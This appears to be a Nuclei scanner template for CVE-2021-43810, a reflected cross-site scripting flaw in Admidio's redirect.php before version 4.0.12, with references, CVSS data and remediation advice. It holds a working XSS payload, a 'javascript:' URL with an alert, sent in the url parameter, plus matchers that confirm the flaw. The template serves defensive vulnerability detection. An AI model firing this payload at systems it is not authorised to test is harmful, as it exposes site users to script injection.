id: CVE-2021-43810 info: name: Admidio - Cross-Site Scripting author: gy741 severity: medium description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. remediation: Upgrade to version 4.0.12 or later. reference: - https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh - https://nvd.nist.gov/vuln/detail/CVE-2021-43810 - https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b - https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21 - https://github.com/Admidio/admidio/releases/tag/v4.0.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-43810 cwe-id: CWE-79 epss-score: 0.00513 epss-percentile: 0.73914 cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: admidio product: admidio tags: cve,cve2021,admidio,xss http: - method: GET path: - '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)' matchers-condition: and matchers: - type: word part: body words: - 'please click ' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a004630440220731cae8542dd1815886f8baaaa6ed76a5cfc6c082fe60ec2b7ee294eff595f000220583ae880a62e31af039d2f99af7dd71e3563fa3b83f0efac33d647b0aa295f75:922c64590222798bb761d5b6d8e72950